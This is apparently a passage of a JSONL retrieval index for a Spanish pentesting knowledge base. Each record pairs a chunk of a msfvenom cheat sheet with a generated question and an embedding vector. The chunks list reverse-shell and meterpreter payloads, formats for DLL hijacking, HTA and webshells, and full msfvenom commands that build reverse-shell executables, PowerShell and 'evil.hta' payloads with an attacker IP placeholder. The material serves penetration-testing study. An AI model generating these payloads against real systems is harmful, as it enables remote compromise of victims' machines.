0.01361, 0.0483, 0.01145, -0.00967, -0.07757, -0.06441, -0.00261, 0.02341, 0.00364, 0.00691, -0.00784, -0.08791, 0.01306, 0.05778, 0.00659, 0.01537, 0.04878, -0.07681, 0.06216, -0.11263, -0.03601, 0.03048, -0.05331, -0.08364, -0.02862, -0.01841, 0.06042, -0.03455, 0.03715, 0.04319, -0.03629, 0.02872, -0.0507, -0.07441, -0.03203, 0.00047, -0.01957, -0.1257, 0.01333, 0.01239, 0.03396, -0.00054, -0.09737, -0.01656, -0.01849, 0.01097, 0.04136, -0.01057, 0.08829, -0.01783, -0.04675, -0.04279, -0.03535, -0.00197, -0.00892, -0.00353, 0.00139, -0.01202, -0.03501, 0.00857, -0.04702, 0.00076, 0.0118, -0.08922, 0.04935, 0.0315, 0.02251, 0.04127, -0.06205, 0.12497, -0.01793, -0.03724, 0.04631, -0.0002, -0.00109, 0.03236, 0.02751, 0.04353, 0.00274, 0.05303, -0.0267, -0.00883, 0.03217, 0.05638, 0.02702, 0.03537, 0.05383, 0.01235, 0.05118, -0.0536, -0.01456, 0.0625, 0.02967, 0.02125, -0.03199, -0.09906, 0.03751, 0.05079, 0.04741, -0.04588, -0.05356, -0.00866, -0.0346, -0.04201, 0.06201, -0.07685, -0.04655, -0.02376, 0.09122, -0.00363, -0.05337, 0.0526, -0.01634]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## AnatomΓ­a\n```bash\nmsfvenom -p LHOST=TU_IP LPORT=443 -f -o salida [-b badchars] [-e encoder]\n```", "indexar": "cual es el comando principal para construir vectores de ataque personalizados?", "v": [0.09802, -0.00576, -0.14077, -0.09964, -0.02327, 0.02931, 0.17723, -0.02503, -0.02372, -0.10029, 0.01987, -0.05262, -0.07447, -0.08205, 0.08954, 0.05646, 0.1226, -0.12733, 0.06128, 0.00049, 0.07619, -0.03243, 0.13866, -0.01786, 0.00017, 0.10744, 0.03673, 0.06392, -0.08965, -0.07077, 0.02751, 0.03795, 0.07845, -0.02482, -0.0007, -0.04936, -0.0945, 0.03083, -0.07024, 0.2055, -0.05576, 0.04226, -0.23273, -0.01308, 0.04574, -0.05049, 0.11271, -0.02621, 0.00573, -0.07946, -0.009, 0.08297, -0.11028, 0.00714, 0.00585, -0.01655, 0.11464, -0.07193, 0.06266, 0.02723, -0.12099, 0.00505, 0.05665, -0.04287, -0.01978, -0.08423, -0.09625, -0.10081, -0.05405, -0.07163, -0.02333, 0.00013, -0.04083, 0.05695, 0.11077, 0.06759, 0.01063, 0.06123, 0.06806, -0.01115, -0.04521, -0.04709, -0.13456, 0.03723, 0.00546, -0.03955, -0.05634, -0.08036, -0.04334, -0.03937, 0.0097, -0.05268, -0.03605, -0.03321, -0.05987, -0.00196, 0.05971, -0.02015, 0.09836, 0.05072, 0.00075, -0.09533, -0.10761, 0.14189, 0.08928, 0.03945, 0.0003, -0.05087, 0.00757, -0.02998, -0.00205, -0.12315, -0.01498, -0.04439, -0.00534, -0.11661, -0.07567, -0.00351, 0.0239, -0.06318, -0.13996, 0.02535, -0.03559, 0.08787, -0.04467, -0.01069, -0.04835, -0.01983, -0.01242, 0.04436, -0.00819, 0.03875, 0.0282, -0.07871, -0.10832, 0.13071, 0.00804, -0.10992, -0.04626, -0.07316, 0.01407, 0.06063, 0.05824, -0.07074, -0.00141, 0.02075, 0.04463, -0.09179, -0.08521, 0.07483, 0.0198, 0.10746, 0.01887, 0.08411, -0.08444, -0.05815, -0.07321, 0.00828, -0.05273, 0.12691, -0.00054, 0.05391, -0.07024, 0.05984, 0.0383, -0.09162, -0.04431, -0.0284, 0.07381, 0.04625, -0.00291, -0.01297, 0.00379, -0.00811, 0.01262, -0.11241, -0.05401, -0.10155, 0.03396, 0.00348, 0.00573, 0.01392, -0.04006, 0.01803, -0.03458, -0.05941, 0.02077, 0.04713, 0.08257, 0.02387, -0.03682, 0.05105, -0.02546, -0.02041, 0.01758, -0.05298, -0.00155, -0.00099, -0.03757, -0.00797, 0.01646, 0.04741, -0.00396, -0.05136, 0.05415, 0.01414, -0.05323, -0.00687, -0.00216, 0.05776, 0.05012, -0.02294, 0.07701, -0.00881, -0.03137, 0.01812, 0.01829, -0.00845, -0.00731, 0.00728, 0.03323, 0.03395, 0.01154, 0.01883, -0.00039, -0.02758, -0.02097, -0.03139, 0.02325, 0.05441, -0.07, -0.02895, 0.00229, -0.05696, 0.05696, 0.03197, 0.02261, 0.00904, -0.03982, -0.00162, 0.03899, 0.06053, -0.07381, -0.04868, -0.03331, -0.07652, -0.06525, 0.01989, -0.04536, -0.04569, -0.03323, 0.08118, 0.01845, -0.01861, 0.02653, -0.05994]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "quΓ© herramienta me sirve para hacer una conexiΓ³n shell reversa por TCP en Windows?", "v": [-0.06952, 0.03388, -0.13853, -0.12582, 0.0322, -0.16334, -0.14121, 0.00042, 0.14505, -0.01339, -0.08323, -0.02055, 0.037, -0.09234, 0.02397, 0.05303, -0.0471, -0.09325, 0.12235, -0.02475, 0.006, -0.02902, -0.11882, -0.06918, -0.03577, 0.04588, 0.06369, -0.00277, -0.17556, -0.0375, -0.02172, -0.10982, 0.03433, 0.02489, -0.11606, 0.08321, -0.0371, 0.05884, 0.0784, 0.10095, 0.00757, 0.09447, -0.05503, 0.16645, 0.131, -0.00875, 0.07991, -0.09036, 0.02409, 0.10288, -0.14816, -0.12179, -0.17905, -0.02174, 0.019, -0.07579, 0.15717, -0.10678, 0.05469, -0.08253, -0.1459, 0.08039, -0.14534, -0.01853, 0.01131, -0.04353, -0.05676, -0.12068, -0.02855, 0.13562, -0.09315, 0.02708, 0.05881, -0.07748, -0.00146, -0.00887, 0.04263, 0.00609, 0.10791, -0.02111, 0.02482, -0.00784, -0.0643, -0.04177, -0.02037, -0.11339, 0.04397, -0.00017, 0.05442, -0.11187, 0.03818, 0.04776, -0.07229, 0.05804, 0.02548, -0.09973, -0.07901, -0.06812, -0.04213, 0.05241, 0.08699, -0.06226, -0.04086, 0.09194, -0.0803, -0.01438, -0.03338, -0.02887, -0.08211, 0.07617, 0.0842, 0.06382, -0.02787, 0.0367, -0.01208, 0.01583, -0.01271, -0.05937, 0.00736, 0.00702, -0.00688, 0.02941, -0.07391, -0.02506, -0.02374, 0.01517, -0.04773, 0.11368, -0.06054, -0.02015, 0.03348, 0.00125, -0.09917, -0.01369, -0.05684, 0.017, 0.05227, -0.1162, 0.04234, -0.10166, 0.09311, 0.06579, -0.02832, -0.04807, -0.008, -0.01307, 0.11741, 0.00276, -0.04609, -0.01024, 0.02382, -0.06201, -0.07273, -0.0152, -0.00325, -0.03015, -0.01509, 0.05876, -0.00685, 0.03135, -0.04296, -0.03771, 0.014, -0.01897, 0.01979, -0.05875, -0.0379, 0.08587, 0.04525, -0.01435, 0.00992, 0.02023, 0.04899, -0.01545, 0.02365, -0.03813, -0.01399, 0.00812, -0.04789, -0.06214, -0.0264, -0.04941, 0.01875, -0.06073, 0.01634, 0.00872, 0.01641, 0.03632, -0.0346, 0.03076, -0.06979, -0.00195, 0.05831, -0.05343, 0.01202, 0.00597, 0.0412, -0.10325, 0.07469, 0.05676, -0.01135, -0.05408, 0.03143, -0.06634, 0.06052, 0.07236, -0.05022, 0.02761, 0.04313, 0.03064, 0.0203, 0.0551, 0.03301, 0.02948, -0.002, 0.00314, 0.02615, 0.02559, -0.02429, 0.01414, 0.03514, -0.04951, 0.0022, 0.04206, -0.00763, -0.02963, -0.03914, -0.03535, -0.02251, -0.02409, 0.03638, 0.00254, 0.04445, -0.01916, -0.05273, -0.06378, -0.03329, -0.04418, -0.0331, -0.00674, -0.0548, 0.0413, 0.00789, -0.05219, -0.00548, -0.02616, 0.01422, -0.03415, -0.02797, -0.04872, -0.04251, -0.03388, 0.03486, -0.00018, -0.01427, 0.04041]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "con quΓ© puedo montar un handler sencillo sin Metasploit para recibir payloads?", "v": [0.02429, 0.09603, -0.19923, -0.10294, -0.1531, -0.01032, 0.00657, -0.00524, -0.20583, -0.00407, -0.08791, 0.03314, 0.15497, -0.01895, -0.03309, 0.11777, -0.03662, -0.06074, -0.04353, -0.12545, -0.03401, -0.05228, -0.04114, -0.18579, 0.02252, 0.22152, 0.02486, 0.08221, -0.19264, 0.03091, 0.01705, 0.07319, -0.04029, 0.03638, 0.0056, -0.03243, 0.00049, 0.11707, 0.05952, -0.00024, -0.06424, 0.0336, -0.01427, 0.10879, 0.08247, -0.04836, 0.05231, -0.0691, -0.03376, -0.04489, 0.10111, 0.04721, -0.09986, 0.04088, -0.11074, -0.08055, 0.15022, -0.05154, 0.03309, 0.02018, 0.03525, 0.14571, 0.00632, 0.01372, -0.01282, -0.05136, 0.02365, 0.07878, -0.05918, -0.08862, 0.02234, -0.06578, -0.02047, 0.03706, 0.00781, 0.04949, -0.05536, 0.01973, 0.07536, 0.13888, 0.08594, 0.00184, -0.05363, -0.01121, 0.02451, 0.00169, -0.03747, -0.0621, 0.11605, -0.03466, 0.10072, 0.00284, -0.04203, -0.03446, -0.08919, -0.06643, -0.04255, 0.05231, -0.03246, 0.06085, -0.01563, -0.01058, 0.05734, 0.06098, 0.04478, 0.02869, 0.0686, -0.10563, -0.01682, -0.11627, 0.07676, -0.01852, -0.04009, 0.03937, -0.08947, -0.0555, -0.03881, 0.05143, -0.05082, 0.00942, -0.05692, 0.03746, 0.04709, 0.0378, 0.06804, -0.06518, 0.01959, 0.0576, 0.05281, 0.01669, -0.01835, 0.05795, -0.00702, 0.01238, 0.03226, 0.00516, 0.11585, -0.03256, -0.02768, 0.05841, 0.06238, 0.04259, 0.02866, -0.01368, 0.0313, 0.02236, 0.02976, -0.04098, 0.01037, -0.02698, 0.12493, 0.04551, 0.02468, -0.03296, -0.05871, -0.12461, 0.10514, 0.01283, 0.0555, -0.01585, 0.01788, 0.07033, -0.08671, -0.02862, -0.02685, -0.03008, -0.02466, -0.00067, -0.06915, 0.10272, 0.0171, 0.03746, 0.0556, -0.00702, 0.03069, -0.03461, -0.07886, -0.01979, 0.01196, 0.04969, -0.14837, -0.00176, 0.05067, 0.08892, -0.00458, -0.0677, 0.00383, 0.02274, 0.02477, 0.04221, 0.06038, 0.02479, -0.02825, -0.05143, 0.02497, 0.01462, -0.00832, -0.01347, -0.01321, 0.04257, 0.02988, -0.07614, 0.04208, -0.04102, 0.0244, -0.01351, -0.06215, 0.0719, 0.05631, 0.01665, 0.05925, -0.06008, 0.06276, -0.0595, -0.02799, 0.01296, -0.02591, 0.058, -0.04163, 0.10833, -0.01717, 0.01871, 0.05225, -0.03968, -0.02695, 0.07312, 0.00958, 0.00954, 0.06151, 0.02464, -0.05264, 0.0253, -0.05781, 0.01891, 0.04276, 0.01603, -0.0021, 0.01859, -0.05345, 0.06493, 0.05486, 0.03279, -0.04308, -0.06386, -0.05133, -0.05492, -0.00855, 0.03566, -0.02163, 0.0008, -0.0175, 0.03879, -0.03324, -0.02093, -0.02211, -0.00995]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Payloads frecuentes\n```\nwindows/shell_reverse_tcp shell normal (no necesita Metasploit para recibir β†’ nc)\nwindows/meterpreter/reverse_tcp meterpreter (recΓ­belo con multi/handler)\nlinux/x86/shell_reverse_tcp\nwindows/x64/shell_reverse_tcp (x64)\n```", "indexar": "quΓ© programa es mejor para ejecutar shells de tipo reverse_tcp en Linux o Windows?", "v": [0.0656, -0.0086, -0.05316, -0.10447, 0.06646, -0.13655, -0.11876, 0.01776, 0.07749, 0.00944, -0.03838, -0.03108, 0.00711, -0.07329, 0.02093, -0.05788, -0.12938, -0.15255, 0.13517, -0.09651, -0.09326, 0.01195, -0.15244, -0.05139, 0.03282, 0.05303, 0.02438, -0.04406, -0.04696, 0.0001, -0.07501, -0.07694, 0.03168, -0.01545, -0.04253, 0.16021, 0.01637, 0.02762, 0.08825, 0.13589, 0.07533, 0.05663, -0.05481, 0.10911, 0.0506, -0.13064, 0.12144, -0.10262, 0.11808, -0.17299, -0.04124, -0.01279, -0.09118, -0.03028, 0.07427, -0.01849, 0.08265, -0.12497, 0.07152, -0.01766, -0.11332, 0.11313, -0.06153, -0.04744, 0.06788, -0.01463, -0.01942, -0.09005, -0.06835, 0.06384, -0.03666, 0.09884, 0.03109, 0.04931, 0.02973, 0.00314, -0.07358, 0.03824, 0.10517, -0.03026, 0.01332, -0.02162, 0.00086, 0.04134, -0.06845, -0.15156, -0.04998, 0.02263, -0.02777, -0.02019, 0.06694, 0.04238, -0.03042, 0.17235, 0.09965, -0.11441, 0.04825, 0.04363, -0.03987, 0.07075, -0.04704, -0.02148, -0.09201, 0.15259, -0.03826, 0.0682, -0.00197, -0.04109, -0.04338, 0.01675, 0.03304, 0.03298, 0.03865, -0.00214, -0.07527, -0.11363, -0.05252, -0.0597, 0.06987, -0.00592, -0.11343, -0.00083, -0.07938, 0.03186, 0.02171, 0.00582, -0.04609, 0.14734, -0.11255, 0.0234, 0.03158, -0.05396, -0.01757, -0.02101, -0.09314, 0.09202, 0.08289, -0.07151, 0.00116, -0.07019, 0.05341, 0.08718, 0.01096, 0.03842, 0.08289, -0.02138, 0.05872, -0.04361, -0.03826, -0.00919, 0.0567, 0.03618, -0.02262, -0.01093, -0.10769, -0.0715, 0.0123, 0.00683, 0.01752, 0.04206, -0.00628, -0.02085, -0.02283, -0.02787, 0.02357, 0.01098, -0.04339, 0.1173, 0.03385, -0.00067, 0.00792, 0.10282, 0.0068, -0.06561, 0.01787, -0.06054, 0.03781, -0.06219, 0.03006, 0.01127, -0.05429, 0.02582, 0.09034, -0.05244, 0.00584, 0.02131, -0.0532, 0.086, -0.01259, -0.01274, -0.00079, -0.02115, -0.00158, -0.01725, -0.00996, 0.01989, -0.01962, -0.0372, 0.00801, 0.02247, -0.08466, 0.02378, 0.05066, -0.05161, 0.02872, 0.06407, -0.05254, -0.00073, 0.04158, 0.03677, 0.00732, 0.04254, 0.02663, 0.03151, -0.00703, -0.01628, 0.01905, 0.05319, 0.07456, 0.03489, -0.01565, -0.03091, 0.03177, 0.00422, -0.01628, -0.12461, -0.01748, 0.0043, 0.01444, -0.01366, 0.02122, 0.00767, 0.0366, 0.00742, -0.02181, -0.0177, -0.04066, -0.04903, 0.03853, -0.05408, -0.05911, 0.07277, -0.01237, -0.10055, -0.01456, 0.00015, -0.06694, -0.0158, -0.02531, -0.00565, -0.04495, -0.00541, 0.03333, -0.02836, -0.04157, 0.03941]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "que herramienta sirve para analizar shellcode crudo", "v": [0.01762, -0.10744, -0.1465, -0.15442, -0.00316, -0.20535, -0.03661, -0.01246, -0.0497, -0.09228, -0.08146, -0.0852, 0.02307, -0.15433, 0.09324, -0.01816, -0.02764, -0.15745, 0.01988, 0.07645, 0.05507, -0.06638, -0.15781, -0.06706, -0.12448, 0.02545, -0.03506, 0.04272, -0.14466, -0.01617, -0.08763, 0.00165, 0.05671, -0.0533, -0.08541, -0.0133, -0.02471, 0.02524, -0.08557, 0.12367, -0.03094, 0.04259, -0.07229, 0.06839, 0.01872, -0.01027, -0.03418, -0.00296, -0.00515, 0.104, 0.01281, -0.11506, -0.18146, 0.01465, 0.0363, -0.01937, 0.14441, -0.14407, 0.08643, -0.0315, -0.06137, -0.06793, 0.11524, -0.0754, -0.02296, 0.01648, 0.07784, 0.01937, -0.04936, -0.01476, -0.08734, -0.01388, -0.0037, -0.02491, -0.03048, -0.02228, 0.02463, 0.12327, 0.11318, 0.03549, 0.0762, 0.0097, -0.05913, 0.05141, -0.11882, -0.0621, 0.06653, -0.06369, 0.02584, -0.00109, -0.0069, 0.00453, 0.00979, 0.13993, 0.01506, 0.0362, 0.04777, -0.04502, 0.032, 0.03914, 0.11306, -0.10955, -0.03118, 0.06998, 0.15143, 0.13285, -0.04226, -0.01054, -0.0158, 0.09277, 0.04069, 0.02369, 0.01528, 0.00598, 0.01525, 0.05689, -0.03764, -0.08369, -0.00039, -0.13068, 0.03784, 0.09892, -0.12218, 0.05062, -0.02765, 0.00505, -0.02211, 0.05434, 0.02537, -0.06834, -0.059, -0.00682, -0.09671, 0.10833, -0.01179, -0.00858, 0.03918, -0.07354, 0.01018, -0.06588, 0.03322, 0.09672, -0.09268, 0.00099, 0.08708, 0.06639, 0.0355, -0.0291, -0.00037, -0.02389, 0.04817, -0.04894, -0.10311, 0.03391, -0.02705, -0.09216, -0.01341, 0.02798, -0.07327, -0.0177, -0.04509, -0.1065, 0.06346, 0.03829, 0.04015, -0.04168, 0.01044, -0.01608, 0.10704, 0.01998, 0.072, 0.04725, 0.11639, -0.05641, 0.03684, -0.01931, 0.0263, 0.03216, -0.04024, -0.05146, -0.03354, -0.03248, -0.0721, -0.05576, -0.01846, 0.02523, 0.02575, -0.02284, -0.04966, -0.00876, 0.01634, 0.01661, 0.01946, -0.03401, 0.02077, 0.06485, 0.01389, -0.04042, 0.05391, -0.03036, -0.05391, 0.0843, -0.00109, -0.03668, 0.00897, 0.07473, -0.04369, -0.03706, 0.03838, -0.00312, -0.01845, -0.0271, 0.02863, 0.0026, 0.01618, -0.03545, -0.01429, 0.06449, 0.01353, 0.04806, 0.01007, -0.01448, 0.06117, -0.05593, -0.01843, 0.02972, 0.03179, -0.02217, -0.00364, 0.00396, 0.03453, -0.01662, -0.00369, 0.03365, -0.01472, -0.02764, 0.05312, 0.0061, -0.03418, -0.05819, 0.03607, 0.05159, -0.01783, -0.01527, -0.00319, -0.04681, -0.01465, -0.05038, -0.00291, -0.02611, -0.0569, 0.01531, 0.06408, 0.00413, 0.01771, -0.01059]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "cual programa puedo usar para montar un ataque de DLL hijacking en Windows", "v": [-0.21431, 0.02874, -0.13845, -0.11521, -0.07628, -0.03775, -0.08502, 0.03916, -0.07216, -0.06488, 0.04882, -0.17387, -0.05739, -0.0681, -0.09246, -0.06483, 0.0698, -0.10131, 0.04622, -0.09902, -0.07069, -0.00115, -0.03923, -0.06891, -0.10846, 0.07602, 0.01124, 0.02565, -0.14258, -0.10026, 0.05146, -0.03224, 0.08055, -0.02094, 0.03382, -0.04357, -0.04747, 0.04738, 0.13378, 0.09182, 0.00807, 0.06736, -0.12843, 0.02728, 0.05101, 0.09468, 0.11698, -0.02239, 0.00624, -0.03128, 0.05319, 0.13991, -0.07779, -0.0224, 0.07954, -0.1397, 0.05963, -0.10809, -0.02427, 0.08241, -0.08166, 0.13672, -0.04678, 0.01284, 0.02003, -0.05586, 0.02762, 0.02491, -0.05673, 0.05387, 0.00937, -0.00618, 0.06095, -0.00089, 0.02948, 0.0538, -0.03353, -0.02607, 0.16679, -0.00448, -0.01827, 0.00956, -0.02599, 0.05421, -0.11301, -0.0259, 0.01585, -0.06088, 0.02917, -0.07652, 0.06031, -0.02654, -0.01337, 0.02328, 0.01047, -0.17177, 0.06884, 0.00779, -0.00435, -0.0158, -0.04351, -0.14642, -0.04083, 0.17404, -0.01723, 0.07599, -0.01018, -0.09178, -0.01052, -0.06907, -0.01101, 0.00675, -0.16992, -0.04863, -0.06597, -0.05653, -0.04482, -0.04864, -0.03039, 0.00027, -0.08676, 0.08239, -0.0088, 0.02312, 0.03352, -0.00159, 0.01253, 0.10431, -0.16503, 0.0608, 0.02916, -0.04906, 0.03319, -0.08118, -0.06929, 0.03295, -0.01232, -0.04404, -0.03353, -0.01085, 0.07228, 0.05853, 0.04896, 0.01805, 0.01083, 0.0657, 0.06275, -0.01853, -0.04933, 0.06167, 0.11824, 0.02823, 0.04679, 0.04983, -0.08441, -0.04823, 0.02187, 0.07945, -0.00238, 0.07262, -0.01438, 0.01397, -0.07155, 0.01404, 0.03431, -0.04853, -0.01402, -0.03909, 0.0612, 0.00251, -0.05868, 0.10366, 0.01255, -0.00748, 0.0355, -0.02089, -0.03491, -0.05724, 0.01376, -0.01888, -0.08524, 0.02371, 0.03453, 0.0619, -0.06948, -0.02568, 0.04313, 0.05379, -0.00071, -0.02356, -0.08582, 0.0138, 0.02074, 0.00119, 0.03481, -0.06235, -0.02397, 0.01181, 0.06701, 0.00903, -0.07754, -0.02387, -0.04313, -0.0719, 0.09258, 0.06887, -0.02219, 0.00652, 0.0349, 0.10008, 0.03222, -0.01643, 0.018, -0.0172, -0.07122, -0.0201, -0.01436, -0.00039, 0.02862, 0.0724, 0.0362, 0.01709, 0.01924, 0.0416, -0.00102, -0.0722, -0.0472, -0.04203, 0.04546, 0.00652, 0.0028, 0.00348, 0.01436, -0.05313, -0.01524, 0.00785, 0.01314, -0.03319, 0.00414, -0.04408, -0.01351, 0.06976, 0.01793, -0.06296, -0.02713, -0.00864, -0.07101, 0.04161, -0.00519, -0.05899, -0.01963, 0.02752, -0.00682, -0.03658, -0.0015, 0.03615]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Formatos (-f) segΓΊn el caso\n```\nexe ejecutable Windows dll DLL hijacking / Exploits conocidos\nraw shellcode crudo (B0F) py para tu script de Buffer Overflow\npsh / powershell hta-psh Client-side attacks\naspx / war / jsp webshells para upload\nelf ejecutable Linux\n```", "indexar": "con que puedo convertir mi script a formato binario para ejecutarlo en Linux", "v": [0.06138, 0.06647, -0.16102, -0.05673, -0.00591, -0.16882, -0.17265, 0.00752, -0.1099, -0.09269, 0.07294, -0.10955, 0.09513, -0.09133, 0.03225, -0.07899, -0.09519, -0.14521, -0.00412, -0.12126, 0.03061, 0.05366, -0.04674, -0.02068, 0.11075, 0.01714, -0.0229, -0.02124, -0.07265, 0.04732, -0.04465, 0.07263, 0.16076, 0.02137, 0.0096, 0.06721, 0.03921, 0.10496, 0.00706, 0.19577, 0.08844, 0.07101, -0.02322, 0.1264, -0.13503, -0.15835, 0.05829, -0.04299, -0.03166, -0.12509, 0.13464, 0.00793, -0.1078, -0.01567, 0.0384, -0.0485, 0.1585, -0.22728, -0.00263, 0.03803, -0.02755, -0.03696, 0.06246, -0.00279, 0.0308, 0.06338, -0.06369, 0.04046, -0.14049, 0.01749, -0.07496, 0.13523, -0.06182, 0.06233, 0.01088, 0.02574, -0.11161, -0.00243, 0.07107, -0.01433, 0.04402, -0.04993, 0.02618, 0.08026, -0.05005, -0.09138, -0.07918, 0.01272, -0.00739, 0.04448, 0.07475, -0.01141, -0.00466, 0.07008, 0.06729, -0.04559, -0.00278, 0.06252, -0.02515, 0.02731, -0.0368, 0.07638, -0.11765, 0.12034, 0.02397, 0.07376, -0.0069, 0.02433, 0.00927, -0.0105, 0.05273, 0.03809, 0.06825, -0.03088, -0.02106, -0.04429, -0.03305, 0.00077, 0.02287, -0.00555, -0.09707, 0.09173, -0.06842, 0.00663, 0.02565, -0.07182, -0.05307, 0.04952, -0.03359, 0.00399, -0.00428, -0.05615, -0.03508, -0.05561, -0.04349, 0.10474, 0.09975, -0.08503, -0.04892, -0.03976, 0.03787, 0.05691, -0.00437, 0.01384, 0.07554, -0.05859, 0.02376, -0.08732, -0.00712, -0.07415, 0.00231, 0.0105, 0.01959, 0.00616, -0.11168, -0.08984, 0.06712, -0.02207, -0.01276, 0.00476, 0.01054, 0.00282, -0.0031, -0.02952, -0.03595, 0.00768, -0.02106, -0.02041, 0.01347, -0.00505, -0.00793, 0.02634, 0.01388, -0.04502, 0.04709, -0.12937, -0.0539, -0.01273, -0.02638, -0.00055, 0.00768, 0.0255, 0.04462, -0.0151, 0.00642, 0.05172, 0.00278, 0.01221, -0.03246, -0.00915, 0.03895, 0.05524, -0.0144, -0.11398, 0.00739, 0.02132, -0.02256, 0.01101, -0.04211, -0.01014, -0.0333, 0.04581, 5e-05, -0.01968, 0.0362, 0.02878, -0.0669, 0.01511, -0.03343, 0.0107, -0.00552, -0.00636, 0.05753, -0.03228, -0.033, 0.00787, 0.02899, 0.04795, 0.08288, -0.00573, 0.00064, 0.01017, 0.06227, -0.02243, -0.01017, -0.08855, 0.02603, 0.00795, -0.05376, 0.01986, 0.01129, 0.0142, -0.04251, 0.02669, 0.00087, 0.00834, -0.03123, -0.00391, -0.04554, -0.04158, 0.01403, 0.08517, -0.01695, -0.05818, -0.04398, -0.01087, -0.09866, -0.00727, -0.01635, -0.05389, -0.04698, 0.03741, 0.07015, -0.02512, -0.05449, 0.0067]} -{"tipo": "pregunta", "herramienta": "msfvenom", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/msfvenom.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Ejemplos\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f exe -o rev.exe\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\" -f py\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ AV evasion\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta\n```\n- Encoders (`-e x86/shikata_ga_nai`) ofuscan, **no** evaden AV moderno por sΓ­ solos β†’ ver AV evasion.\n\nRelacionado: Reverse shell Β· Metasploit Β· OSCP MOC", "indexar": "que programa sirve para crear un shell inverso de Windows?", "v": [0.08516, 0.00713, -0.1232, -0.05174, 0.03876, -0.13209, -0.0849, -0.12535, 0.02429, -0.11784, -0.02775, -0.09232, -0.01968, -0.15076, -0.02777, 0.03916, -0.00426, -0.14206, 0.03366, 0.04121, -0.0256, -0.03277, 0.00708, -0.0652, -0.07886, 0.02743, -0.04533, 0.00924, -0.05504, 0.00678, -0.03248, -0.06092, 0.05174, -0.10827, -0.02741, 0.01864, 0.00205, 0.00488, 0.00711, 0.12382, 0.08633, 0.12216, -0.04421, 0.17803, 0.04015, 0.01514, 0.12701, -0.04431, 0.05691, 0.0411, -0.05804, -0.03714, -0.10371, -0.00384, 0.1516, -0.11851, 0.07031, -0.17857, -0.04063, -0.05737, -0.07688, 0.11565, -0.03062, 0.02961, 0.05742, -0.04125, -0.01427, -0.04777, 0.0037, 0.05067, -0.11106, 0.00844, 0.09511, -0.04166, 0.00235, 0.04096, -0.03506, -0.01719, 0.02516, -0.10744, -0.05689, -0.01511, 0.00475, -0.03061, -0.0166, -0.09784, 0.0032, -0.00597, -0.01545, -0.07331, 0.02576, 0.02375, -0.05336, 0.09818, 0.06228, -0.06722, 0.05899, -0.00893, 0.0223, 0.13103, -0.01729, -0.14089, -0.05792, 0.13893, -0.03925, 0.13279, 0.02505, -0.03276, -0.08255, 0.11434, 0.03963, -0.01198, 0.00098, -0.02404, 0.00217, -0.02683, -0.01571, -0.03918, 0.10093, 0.04402, -0.09842, 0.02098, -0.08336, 0.07786, -0.01089, -0.05481, -0.07416, 0.11256, -0.05277, 0.11371, 0.02008, 0.0068, -0.06236, -0.00175, -0.13281, 0.03881, 0.08477, 0.02984, 0.00865, -0.06776, 0.13943, 0.14054, 0.04492, -0.01789, -0.0412, -0.00336, 0.1278, -0.04573, -0.06258, 0.00933, 0.00238, 0.04356, -0.00346, 0.02875, -0.10955, -0.06899, -0.00066, -0.00125, -0.01499, 0.05052, -0.05043, 0.04194, -0.01009, -0.04569, 0.03527, -0.08108, -0.08587, 0.035, 0.1006, 0.01903, -0.06678, 0.07336, 0.03377, -0.03437, 0.00677, 0.04445, 0.02307, -0.01664, 0.0066, -0.02352, -0.0922, 0.01184, 0.02602, -0.06063, -0.03514, 0.0291, -0.03186, 0.07364, -0.02065, -0.01279, -0.0609, 0.01608, 0.00469, -0.03235, -0.06112, 0.04446, 0.00756, -0.06602, 0.12102, 0.01728, -0.02644, 0.03729, 0.00245, -0.03621, 0.05037, 0.09377, -0.09279, 0.04837, 